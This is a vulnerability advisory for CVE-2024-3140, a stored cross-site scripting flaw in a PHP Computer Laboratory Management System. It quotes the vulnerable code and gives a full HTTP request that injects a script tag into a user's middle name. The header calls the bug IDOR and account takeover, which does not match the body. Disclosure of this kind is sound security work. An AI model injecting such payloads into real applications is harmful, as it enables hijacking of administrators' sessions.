#Vulnerability Details:
#Application Name: Computer Laboratory Management System
#Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html
#Vendor Homepage: https://www.sourcecodester.com/users/tips23
#BuG: Insecure Direct Object References (IDOR) and Account Takeover
#BuG_Author: SoSPiro
#CVE: CVE-2024-3140# Vulnerable code section:
foreach($_POST as $k => $v){
$v = $this->conn->real_escape_string($v);
if(in_array($k, $main_field)){
if(!empty($data)) $data .= ", ";
$data .= " `{$k}` = '{$v}' ";
}
}
- The vulnerable section of the code lies within the registration() method of the Users class. Specifically, the lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks.
# Vulnerability Description:
- The vulnerability arises due to the lack of proper validation and sanitization of user-supplied data before it is used in constructing SQL queries. This allows an attacker to inject malicious scripts, such as JavaScript code, into the database. When the administrator views the user list, the injected script gets executed, leading to a Cross-Site Scripting (XSS) attack.
# Proof of Concept (PoC):
- Poc Video : https://drive.google.com/file/d/1iTJZz3QzLUkKeso5iHfBMlNbIwZy1X-Y/view?usp=sharing
- Request:
POST /php-lms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------381104392340117332004262429571
Content-Length: 946
Origin: http://localhost
Connection: close
Referer: http://localhost/php-lms/admin/?page=user
Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-PwnFox-Color: green
-----------------------------381104392340117332004262429571
Content-Disposition: form-data; name="id"
8
-----------------------------381104392340117332004262429571
Content-Disposition: form-data; name="firstname"
staff2
-----------------------------381104392340117332004262429571
Content-Disposition: form-data; name="middlename"
<script>alert(1)</script>
-----------------------------381104392340117332004262429571
Content-Disposition: form-data; name="lastname"
asd
-----------------------------381104392340117332004262429571
Content-Disposition: form-data; name="username"
staff
-----------------------------381104392340117332004262429571
Content-Disposition: form-data; name="password"
-----------------------------381104392340117332004262429571
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
-----------------------------381104392340117332004262429571--
- In this POST request, an attacker has included a script tag in the "middlename" field:
<script>alert(1)</script>
- When the administrator views the user list, this script tag will be executed, leading to the alert dialog box with the message "1" being displayed. This demonstrates the XSS vulnerability in the application.
# Impact:
- The impact of this vulnerability is significant. An attacker can execute arbitrary JavaScript code within the context of the administrator's session, potentially leading to theft of sensitive information, session hijacking, or defacement of the application. Additionally, since the XSS payload executes within the administrator's session, it can lead to further exploitation of the system or its users.
# Reproduce:
https://github.com/Sospiro014/zday1/blob/main/xss_1.md
https://vuldb.com/?id.258915
https://www.cve.org/CVERecord?id=CVE-2024-3140